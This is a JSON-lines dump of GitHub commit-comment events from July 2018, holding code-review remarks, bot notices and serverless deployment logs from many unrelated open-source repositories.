{"id":"7966899675","type":"CommitCommentEvent","actor":{"login":"DeathEgg"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29711569,"position":null,"line":null,"path":null,"commit_id":"d9cebae42bd50237c09c00024c239f5befa3ff9c","created_at":"2018-07-15T06:35:20Z","updated_at":"2018-07-15T06:35:20Z","author_association":"NONE","body":"Darn. :( Tired of working on it at the moment?"}},"created_at":"2018-07-15T06:35:20Z"}
{"id":"7966901388","type":"CommitCommentEvent","actor":{"login":"myrsloik"},"repo":{"name":"vapoursynth/vsrepo"},"payload":{"comment":{"id":29711580,"position":null,"line":null,"path":null,"commit_id":"ac232c52d69bebd937919c8ceaf153293ba79a31","created_at":"2018-07-15T06:37:11Z","updated_at":"2018-07-15T06:37:11Z","author_association":"MEMBER","body":"Yes"}},"created_at":"2018-07-15T06:37:11Z"}
{"id":"7966901748","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29711582,"position":192,"line":229,"path":"src/sass/_base.scss","commit_id":"55d708638aac2009dd64762785c9c575aba66f40","created_at":"2018-07-15T06:37:29Z","updated_at":"2018-07-15T06:37:29Z","author_association":"CONTRIBUTOR","body":"一系列不同顏色的卡片可以提出 mixin\r\n```scss\r\n@mixin cards($name, $color, $left, $top) {\r\n  .card-#{$name} {\r\n    background-color: $color;\r\n    left: $left;\r\n    top: $top;\r\n  }\r\n}\r\n\r\n@include $cards('purple', $color-purple, 30px, 80px);\r\n```"}},"created_at":"2018-07-15T06:37:29Z"}
{"id":"7966902502","type":"CommitCommentEvent","actor":{"login":"sp193"},"repo":{"name":"ps2dev/ps2sdk"},"payload":{"comment":{"id":29711583,"position":null,"line":null,"path":null,"commit_id":"587cad4c51b53ce80e9f7521facb3e31031e83df","created_at":"2018-07-15T06:38:04Z","updated_at":"2018-07-15T06:38:04Z","author_association":"MEMBER","body":"Fixed in e09a538."}},"created_at":"2018-07-15T06:38:04Z"}
{"id":"7966902525","type":"CommitCommentEvent","actor":{"login":"wwoast"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29711584,"position":5,"line":5,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-15T06:38:05Z","updated_at":"2018-07-15T06:38:05Z","author_association":"OWNER","body":"Can you give me more details on Hana-chan? Is she still at Fuji, or in Mexico City?"}},"created_at":"2018-07-15T06:38:05Z"}
{"id":"7966903055","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29711585,"position":null,"line":null,"path":null,"commit_id":"a8c53e08e961cad86b391dac6b3c212417960d89","created_at":"2018-07-15T06:38:31Z","updated_at":"2018-07-15T06:38:31Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/a8c53e08e961cad86b391dac6b3c212417960d89#commitcomment-29711288) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/ffa91a888ca7c74529028ce859726fd7190d9b46/daily_2018_7_15/report.md). cc @ararslan"}},"created_at":"2018-07-15T06:38:31Z"}
{"id":"7966903414","type":"CommitCommentEvent","actor":{"login":"namho91"},"repo":{"name":"github/backup-utils"},"payload":{"comment":{"id":29711586,"position":null,"line":null,"path":null,"commit_id":"295cb98ac0b71346147198922487047c5895c3b3","created_at":"2018-07-15T06:38:51Z","updated_at":"2018-07-15T06:38:51Z","author_association":"NONE","body":"oh my god....\r\n"}},"created_at":"2018-07-15T06:38:51Z"}
{"id":"7966903678","type":"CommitCommentEvent","actor":{"login":"Zhanghappier"},"repo":{"name":"Zhanghappier/Learn-Python"},"payload":{"comment":{"id":29711587,"position":null,"line":null,"path":null,"commit_id":"1f82de279268bd4c85f62cbe2117c5671644c15b","created_at":"2018-07-15T06:39:04Z","updated_at":"2018-07-15T06:39:04Z","author_association":"OWNER","body":"CCC"}},"created_at":"2018-07-15T06:39:04Z"}
{"id":"7966903771","type":"CommitCommentEvent","actor":{"login":"Zhanghappier"},"repo":{"name":"Zhanghappier/Learn-Python"},"payload":{"comment":{"id":29711588,"position":null,"line":null,"path":null,"commit_id":"1f82de279268bd4c85f62cbe2117c5671644c15b","created_at":"2018-07-15T06:39:09Z","updated_at":"2018-07-15T06:39:09Z","author_association":"OWNER","body":"ddd"}},"created_at":"2018-07-15T06:39:09Z"}
{"id":"7966904388","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"OtorisanVardo/SignEdit"},"payload":{"comment":{"id":29711590,"position":null,"line":null,"path":null,"commit_id":"fbf8f7d5b3aba14114b2c4bd39e25e18c4e4a6aa","created_at":"2018-07-15T06:39:43Z","updated_at":"2018-07-15T06:39:43Z","author_association":"NONE","body":"Dear @OtorisanVardo:\nI regret to inform you that the release you submitted, named \"**SignEdit**\" (v1.2.4), for the project [SignEdit](https://poggit.pmmp.io/ci/OtorisanVardo/SignEdit/SignEdit) on 2018-07-11T04:21:12.000Z, has been rejected.\n\nIf your plugin supports 3.0.0, it automatically supports 3.0.6 too. You don't need to update it.\n\n4.0.0 has not been released yet, and we do not accept plugins targetting 4.0.0 because the API hasn't been finalized.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-15T06:39:43Z"}
{"id":"7966904411","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29711591,"position":null,"line":null,"path":null,"commit_id":"0f622ad2870a11514889e4e4c4da2d195fc66d3e","created_at":"2018-07-15T06:39:45Z","updated_at":"2018-07-15T06:39:45Z","author_association":"OWNER","body":"@VYUN can you figure out why the marked comments fail the test?\r\n\r\n(To run the tests, go to the project root and type `make test`.)"}},"created_at":"2018-07-15T06:39:45Z"}
{"id":"7966905352","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711592,"position":null,"line":null,"path":null,"commit_id":"cb7bf262a67af231b62e51b7f6ace538da28fe91","created_at":"2018-07-15T06:40:43Z","updated_at":"2018-07-15T06:40:43Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-31](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-31).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-31-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:40:43Z"}
{"id":"7966905514","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29711593,"position":14,"line":14,"path":"Dodo.Tests/DSL/BoardsControllerBuilder.cs","commit_id":"803c138b8983b9fcdfa0e6bf9dfea3b5cfd26ca2","created_at":"2018-07-15T06:40:53Z","updated_at":"2018-07-15T06:40:53Z","author_association":"MEMBER","body":"Ты прав, я просто не знал что Сергей вам про Dummy рассказывал :)\r\nЕсли вы знаете про Dummy, то это Dummy :)"}},"created_at":"2018-07-15T06:40:53Z"}
{"id":"7966905690","type":"CommitCommentEvent","actor":{"login":"Zhanghappier"},"repo":{"name":"Zhanghappier/Learn-Python"},"payload":{"comment":{"id":29711594,"position":null,"line":null,"path":null,"commit_id":"9c46e6cf9cb96ce44e76dc2ca451149977294df1","created_at":"2018-07-15T06:41:05Z","updated_at":"2018-07-15T06:41:05Z","author_association":"OWNER","body":"ds"}},"created_at":"2018-07-15T06:41:05Z"}
{"id":"7966906793","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29711595,"position":203,"line":240,"path":"src/sass/_base.scss","commit_id":"55d708638aac2009dd64762785c9c575aba66f40","created_at":"2018-07-15T06:42:15Z","updated_at":"2018-07-15T06:42:15Z","author_association":"CONTRIBUTOR","body":"transform, appear 的取名可以思考一下，讓它更語義化、通用化，例如：\r\n`.card.is-active`, `.card.is-show`, `.card.pull-right` 之類的"}},"created_at":"2018-07-15T06:42:15Z"}
{"id":"7966908098","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29711599,"position":203,"line":240,"path":"src/sass/_base.scss","commit_id":"55d708638aac2009dd64762785c9c575aba66f40","created_at":"2018-07-15T06:43:35Z","updated_at":"2018-07-15T06:43:35Z","author_association":"CONTRIBUTOR","body":"動畫盡可能使用 transform 取代 top/right/bottom/left"}},"created_at":"2018-07-15T06:43:35Z"}
{"id":"7966908855","type":"CommitCommentEvent","actor":{"login":"nbdai"},"repo":{"name":"nbdai/learngit"},"payload":{"comment":{"id":29711601,"position":null,"line":null,"path":null,"commit_id":"c4889d8f421d889420a4d3d7d74c4e5a5a273a0e","created_at":"2018-07-15T06:44:19Z","updated_at":"2018-07-15T06:44:19Z","author_association":"OWNER","body":"tgrfgfgfg"}},"created_at":"2018-07-15T06:44:19Z"}
{"id":"7966909280","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711602,"position":null,"line":null,"path":null,"commit_id":"6b08a682ebb35c9c22b4c2deefc3f096332e2fc2","created_at":"2018-07-15T06:44:47Z","updated_at":"2018-07-15T06:44:47Z","author_association":"NONE","body":"### Results for event id: 3d031832-3687-42e1-a399-5b8ff7607701\n<details><summary>DockerServerless : Deploy to Lambda (5a81f6) Execution completed.</summary>\n<p>\n\n**output tail (290 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 78.06s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 3d031832-3687-42e1-a399-5b8ff7607701-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/3d031832-3687-42e1-a399-5b8ff7607701-output.tar.gz\n{\n    \"ETag\": \"\\\"3aa03b21806fdca7a8b3fa41f4439370\\\"\"\n}\nExecution time was 130 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T06:44:47Z"}
{"id":"7966911618","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29711607,"position":null,"line":null,"path":null,"commit_id":"d9cebae42bd50237c09c00024c239f5befa3ff9c","created_at":"2018-07-15T06:46:54Z","updated_at":"2018-07-15T06:46:54Z","author_association":"OWNER","body":"Yeah, you could say that... I don't even like Heretic that much (aside from the shareware episode). Call it a refocus. DOOM Retro is two things: 1) DOOM and 2) retro."}},"created_at":"2018-07-15T06:46:54Z"}
{"id":"7966914007","type":"CommitCommentEvent","actor":{"login":"Zhanghappier"},"repo":{"name":"Zhanghappier/Learn-Python"},"payload":{"comment":{"id":29711608,"position":4,"line":4,"path":"Think Python 2nd Edition","commit_id":"f09f687f1f85c3f5d51b383c9009c11f3a692d6c","created_at":"2018-07-15T06:48:49Z","updated_at":"2018-07-15T06:48:49Z","author_association":"OWNER","body":"How to think is the core of programming."}},"created_at":"2018-07-15T06:48:49Z"}
{"id":"7966914238","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"rsennrich/Bleualign"},"payload":{"comment":{"id":29711609,"position":106,"line":106,"path":"test/refer/eval1957.SACunidir.-s","commit_id":"33d0bf1daa1116dade3deb2685722eb0dacbf5ea","created_at":"2018-07-15T06:49:06Z","updated_at":"2018-07-15T06:49:06Z","author_association":"NONE","body":"107"}},"created_at":"2018-07-15T06:49:06Z"}
{"id":"7966914356","type":"CommitCommentEvent","actor":{"login":"baxandrei"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29711610,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-15T06:49:14Z","updated_at":"2018-07-15T06:49:14Z","author_association":"CONTRIBUTOR","body":"Same problem: http://prntscr.com/k6lyor\r\n\r\ni am using latest php version, 7.2\r\n\r\nfatal error_log: https://pastebin.com/2QkQZSP5\r\nmisc error_log:  https://pastebin.com/rvhNBMd7"}},"created_at":"2018-07-15T06:49:14Z"}
{"id":"7966914453","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711612,"position":null,"line":null,"path":null,"commit_id":"6e0cf0b4ece5fdcfb28fff9d88390393fa928ab9","created_at":"2018-07-15T06:49:20Z","updated_at":"2018-07-15T06:49:20Z","author_association":"NONE","body":"### Results for event id: 5cb9a374-3389-48a0-add7-0dba46c80ae1\n<details><summary>DockerServerless : Deploy to Lambda (5a81f6) Execution completed.</summary>\n<p>\n\n**output tail (292 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 73.14s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 5cb9a374-3389-48a0-add7-0dba46c80ae1-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/5cb9a374-3389-48a0-add7-0dba46c80ae1-output.tar.gz\n{\n    \"ETag\": \"\\\"4e4bdbc72c1f60a1131f79bff006eb7c\\\"\"\n}\nExecution time was 124 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T06:49:20Z"}
{"id":"7966915312","type":"CommitCommentEvent","actor":{"login":"john-raymon"},"repo":{"name":"john-raymon/egghead.io_redux_course_notes"},"payload":{"comment":{"id":29711616,"position":null,"line":null,"path":null,"commit_id":"a44cc81b8af43626ae154887cf1c4895cfdbc292","created_at":"2018-07-15T06:50:09Z","updated_at":"2018-07-15T06:50:09Z","author_association":"OWNER","body":"The original text lacked clarity of **what exactly** was being invoked that will cause a new push to the array of listeners. It made it seem as if the array was being called, not the subscribe() method."}},"created_at":"2018-07-15T06:50:09Z"}
{"id":"7966921464","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711620,"position":null,"line":null,"path":null,"commit_id":"bb416bfd10ce244f079bf5ca35f7749b4c606403","created_at":"2018-07-15T06:56:26Z","updated_at":"2018-07-15T06:56:26Z","author_association":"NONE","body":"### Results for event id: 0d875e4b-4e4c-41b5-b685-98b0ea16285e\n<details><summary>DockerServerless : Deploy to Lambda (b604f3) Execution completed.</summary>\n<p>\n\n**output tail (249 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-default-dev\napi keys:\n  None\nendpoints:\n  GET - https://ch42quvbsf.execute-api.ap-southeast-2.amazonaws.com/dev/echo\nfunctions:\n  echo: sample-default-dev-echo\n\nStack Outputs\nApiGatewayRestApiRootResource: otxvqi9hph\nEchoLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-default-dev-echo\nApiGatewayRestApi: ch42quvbsf\nServiceEndpoint: https://ch42quvbsf.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: sample-default-dev-serverlessdeploymentbucket-11dr23jsb9pnj\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 68.19s.\nApiGateway Endpoints:\n  GET - https://ch42quvbsf.execute-api.ap-southeast-2.amazonaws.com/master/echo\nSuccess:  sample-default\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 0d875e4b-4e4c-41b5-b685-98b0ea16285e-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/0d875e4b-4e4c-41b5-b685-98b0ea16285e-output.tar.gz\n{\n    \"ETag\": \"\\\"a780fdd46ccb4d022d6b98656ce42845\\\"\"\n}\nExecution time was 120 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T06:56:26Z"}
{"id":"7966921541","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Infernus101/KitUI"},"payload":{"comment":{"id":29711621,"position":null,"line":null,"path":null,"commit_id":"ef44358a89fb866f8ce807c4361685c066addd9b","created_at":"2018-07-15T06:56:31Z","updated_at":"2018-07-15T06:56:31Z","author_association":"NONE","body":"Dear @Infernus101:\nI regret to inform you that the release you submitted, named \"**KitUI**\" (v1.3.0), for the project [KitUI](https://poggit.pmmp.io/ci/Infernus101/KitUI/KitUI) on 2018-07-14T21:52:42.000Z, has been rejected.\n\nIf plugin.yml supports 3.0.0, it automatically supports 3.0.6 too. You don't need to specify every minor version.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-15T06:56:31Z"}
{"id":"7966921843","type":"CommitCommentEvent","actor":{"login":"Zhanghappier"},"repo":{"name":"Zhanghappier/Learn-Python"},"payload":{"comment":{"id":29711622,"position":15,"line":14,"path":"Think Python 2nd Edition","commit_id":"cb1e4e39a22a21dd58ec5e836d0f1d9e41c2a499","created_at":"2018-07-15T06:56:50Z","updated_at":"2018-07-15T06:56:50Z","author_association":"OWNER","body":"A means to an ends."}},"created_at":"2018-07-15T06:56:50Z"}
{"id":"7966935578","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29711655,"position":46,"line":90,"path":"src/sass/_card.scss","commit_id":"92b12d37064f173fa790ec64ac8b41338998d90f","created_at":"2018-07-15T07:09:23Z","updated_at":"2018-07-15T07:09:23Z","author_association":"CONTRIBUTOR","body":"`&-yellow, input:checked + &-yellow, &-yellow.active {}`\r\n會出現這樣的結構感覺有點奇怪，如果是因為要遷就 html，可以思考看看 html 有沒有調整的可能"}},"created_at":"2018-07-15T07:09:23Z"}
{"id":"7966937018","type":"CommitCommentEvent","actor":{"login":"MahbubAlam231"},"repo":{"name":"MahbubAlam231/hybridlinenumber"},"payload":{"comment":{"id":29711656,"position":null,"line":null,"path":null,"commit_id":"c806e6cd1d76ea085821a306f4b77473cc80f0ed","created_at":"2018-07-15T07:10:56Z","updated_at":"2018-07-15T07:10:56Z","author_association":"OWNER","body":"Toggle between absolute and relative line numbers"}},"created_at":"2018-07-15T07:10:56Z"}
{"id":"7966938429","type":"CommitCommentEvent","actor":{"login":"emilio"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29711662,"position":24,"line":47,"path":"components/style/values/specified/source_size_list.rs","commit_id":"e3f97a34c51e42a431dc0d1a00f51779c1af8d74","created_at":"2018-07-15T07:12:19Z","updated_at":"2018-07-15T07:12:19Z","author_association":"MEMBER","body":"I'm not sure I'm really find of making all this public. We should just hook it into the sizes attribute and test it via wpt."}},"created_at":"2018-07-15T07:12:19Z"}
{"id":"7966938877","type":"CommitCommentEvent","actor":{"login":"emilio"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29711663,"position":24,"line":47,"path":"components/style/values/specified/source_size_list.rs","commit_id":"e3f97a34c51e42a431dc0d1a00f51779c1af8d74","created_at":"2018-07-15T07:12:46Z","updated_at":"2018-07-15T07:12:46Z","author_association":"MEMBER","body":"*fond"}},"created_at":"2018-07-15T07:12:46Z"}
{"id":"7966939936","type":"CommitCommentEvent","actor":{"login":"rave991"},"repo":{"name":"poliva/random-scripts"},"payload":{"comment":{"id":29711665,"position":7,"line":30,"path":"android/keeproot.sh","commit_id":"3f14a346b500e7d2a88e70199da2fdf0d9319116","created_at":"2018-07-15T07:13:51Z","updated_at":"2018-07-15T07:13:51Z","author_association":"NONE","body":"Proved "}},"created_at":"2018-07-15T07:13:51Z"}
{"id":"7966940237","type":"CommitCommentEvent","actor":{"login":"lmiller1990"},"repo":{"name":"lily55j/lily-jang"},"payload":{"comment":{"id":29711666,"position":30,"line":12,"path":"artworks_digital.html","commit_id":"442bc43787ba8ef0745f2c5583787afa92c0296f","created_at":"2018-07-15T07:14:09Z","updated_at":"2018-07-15T07:14:09Z","author_association":"NONE","body":"Great"}},"created_at":"2018-07-15T07:14:09Z"}
{"id":"7966942402","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29711675,"position":10,"line":60,"path":"auth_changepassword.php","commit_id":"5aead0c8fea5361b071311eb95ad2d884ef7920c","created_at":"2018-07-15T07:16:14Z","updated_at":"2018-07-15T07:16:14Z","author_association":"CONTRIBUTOR","body":"I thought Auth Method 1 is Apache Auth, you can't change a password for Apache users?"}},"created_at":"2018-07-15T07:16:14Z"}
{"id":"7966943411","type":"CommitCommentEvent","actor":{"login":"PavithraRavichandren"},"repo":{"name":"umairjameel321/angular4crudrequests"},"payload":{"comment":{"id":29711677,"position":4,"line":1,"path":"src/app/app.component.html","commit_id":"e6baa55304c530f4299a9b8c264e42dba85ffaf7","created_at":"2018-07-15T07:17:17Z","updated_at":"2018-07-15T07:17:17Z","author_association":"NONE","body":"the tutorial was very helpful\r\n"}},"created_at":"2018-07-15T07:17:17Z"}
{"id":"7966955132","type":"CommitCommentEvent","actor":{"login":"smalex86"},"repo":{"name":"smalex86/webframework-core"},"payload":{"comment":{"id":29711699,"position":null,"line":null,"path":null,"commit_id":"554917844252f19514236a4d4f83cfefd535fe00","created_at":"2018-07-15T07:29:09Z","updated_at":"2018-07-15T07:29:09Z","author_association":"OWNER","body":"issue #23 "}},"created_at":"2018-07-15T07:29:09Z"}
{"id":"7966955766","type":"CommitCommentEvent","actor":{"login":"E-TZhao"},"repo":{"name":"E-TZhao/Hello-world"},"payload":{"comment":{"id":29711703,"position":2,"line":2,"path":"README.md","commit_id":"e0ee84ce9e189ae6bfeee2a3b9c687fa7b655230","created_at":"2018-07-15T07:29:44Z","updated_at":"2018-07-15T07:29:44Z","author_association":"OWNER","body":"`class ListNode():\r\n\tdef __init__(self, data):\r\n\t\tself.data = data\r\n\t\tself.next = None\r\n\r\n\tdef has_value(self, value):\r\n\t\tif self.data == value:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False`"}},"created_at":"2018-07-15T07:29:44Z"}
{"id":"7966957864","type":"CommitCommentEvent","actor":{"login":"sualko"},"repo":{"name":"jsxc/jsxc"},"payload":{"comment":{"id":29711712,"position":15,"line":1367,"path":"src/jsxc.lib.muc.js","commit_id":"abcf3e6027099c3c8d1304de09b112ded606f16a","created_at":"2018-07-15T07:31:31Z","updated_at":"2018-07-15T07:31:31Z","author_association":"MEMBER","body":"This is jsxc specific."}},"created_at":"2018-07-15T07:31:31Z"}
{"id":"7966959736","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"ratson/factory-bot"},"payload":{"comment":{"id":29711714,"position":null,"line":null,"path":null,"commit_id":"2ef99c0041375cff4d0a6034482b751683b7452a","created_at":"2018-07-15T07:33:17Z","updated_at":"2018-07-15T07:33:17Z","author_association":"NONE","body":"Curious if you saw any perf or build wins?"}},"created_at":"2018-07-15T07:33:17Z"}
{"id":"7966959955","type":"CommitCommentEvent","actor":{"login":"smalex86"},"repo":{"name":"smalex86/webframework-core"},"payload":{"comment":{"id":29711716,"position":null,"line":null,"path":null,"commit_id":"9f6a045b356a27eb5ad457a3bd853f927063eca6","created_at":"2018-07-15T07:33:31Z","updated_at":"2018-07-15T07:33:31Z","author_association":"OWNER","body":"issue #23:\r\n* src/Controller.php - 74-83, 103-121\r\n* src/Server.php - 400\r\n"}},"created_at":"2018-07-15T07:33:31Z"}
{"id":"7966960317","type":"CommitCommentEvent","actor":{"login":"rsetaluri"},"repo":{"name":"rsetaluri/magma_cgra"},"payload":{"comment":{"id":29711717,"position":4,"line":47,"path":"test_cb/test_regression.py","commit_id":"f902373f7a00add65d5825bb5650238a6d1c4855","created_at":"2018-07-15T07:33:55Z","updated_at":"2018-07-15T07:33:55Z","author_association":"OWNER","body":"res returns if this ran successfully. rather than removing res we should assert that it is True."}},"created_at":"2018-07-15T07:33:55Z"}
{"id":"7966961098","type":"CommitCommentEvent","actor":{"login":"flypluswangzhe"},"repo":{"name":"XCSoar/XCSoar"},"payload":{"comment":{"id":29711718,"position":null,"line":null,"path":null,"commit_id":"719cedbf614b037c75081fa86f7be3735fb0daf4","created_at":"2018-07-15T07:34:43Z","updated_at":"2018-07-15T07:34:43Z","author_association":"CONTRIBUTOR","body":"Great. can you send me file then I can test Chinese. or can you put it on somewhere that I can download it for test.\r\n\r\nand do you make KoBoroot.tgz. I make it but Chinese can not show，thanks."}},"created_at":"2018-07-15T07:34:43Z"}
{"id":"7966961260","type":"CommitCommentEvent","actor":{"login":"guyc"},"repo":{"name":"guyc/py-gaugette"},"payload":{"comment":{"id":29711719,"position":7,"line":15,"path":"gaugette/switch.py","commit_id":"d7dc7a84a037bc5555915c82ab934341648f13f6","created_at":"2018-07-15T07:34:52Z","updated_at":"2018-07-15T07:34:52Z","author_association":"OWNER","body":"What's the intention of this conditional?  Both branches are identical."}},"created_at":"2018-07-15T07:34:52Z"}
{"id":"7966962805","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711721,"position":4,"line":4,"path":"config-service/src/main/resources/shared/finance-service.yml","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T07:36:18Z","updated_at":"2018-07-15T07:36:18Z","author_association":"OWNER","body":"Spring Sleuth uses org.springframework.cloud.sleuth.zipkin2.ZipkinAutoConfiguration$RefreshScopedProbabilityBasedSamplerConfiguration to call defaultTraceSampler. When the refresh scope is disabled it throw `IllegalStateException: No Scope registered for scope name 'refresh'`. By default spring.cloud.refresh.enabled is true, hence deleted this property."}},"created_at":"2018-07-15T07:36:18Z"}
{"id":"7966962995","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29711722,"position":null,"line":null,"path":null,"commit_id":"a3541dcea6bd2d16cafd61822c154024d4cde3cd","created_at":"2018-07-15T07:36:32Z","updated_at":"2018-07-15T07:36:32Z","author_association":"MEMBER","body":"@archSeer we will backport if there is a regression on v1.7.0-rc.0 and we need to do another RC."}},"created_at":"2018-07-15T07:36:32Z"}
{"id":"7966963014","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29711723,"position":null,"line":null,"path":null,"commit_id":"2640633e1c35b03ac1c7fd680aaf173c91ec2aaa","created_at":"2018-07-15T07:36:33Z","updated_at":"2018-07-15T07:36:33Z","author_association":"COLLABORATOR","body":"I have tested and found that it works fine. So you can change the commit message :)"}},"created_at":"2018-07-15T07:36:33Z"}
{"id":"7966971228","type":"CommitCommentEvent","actor":{"login":"namhyung"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29711729,"position":null,"line":null,"path":null,"commit_id":"2640633e1c35b03ac1c7fd680aaf173c91ec2aaa","created_at":"2018-07-15T07:44:53Z","updated_at":"2018-07-15T07:44:53Z","author_association":"OWNER","body":"Nice! thanks for testing and good work."}},"created_at":"2018-07-15T07:44:53Z"}
{"id":"7966971489","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711731,"position":4,"line":33,"path":"finance-service/build.gradle","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T07:45:08Z","updated_at":"2018-07-15T07:45:08Z","author_association":"OWNER","body":"To resolve the `The dependencies of some of the beans in the application context form a cycle, with DataSourceConfiguration$Hikari.class and DataSourceInitializerInvoker` error for Spring Cloud Finchley.RELEASE we remove the **spring-boot-starter-data-jpa** dependency since this is not being used in the finance service. The issue seems to be caused when `spring.datasource.initialization-mode=always` as per [Issue 983](https://github.com/spring-cloud/spring-cloud-config/issues/983)."}},"created_at":"2018-07-15T07:45:08Z"}
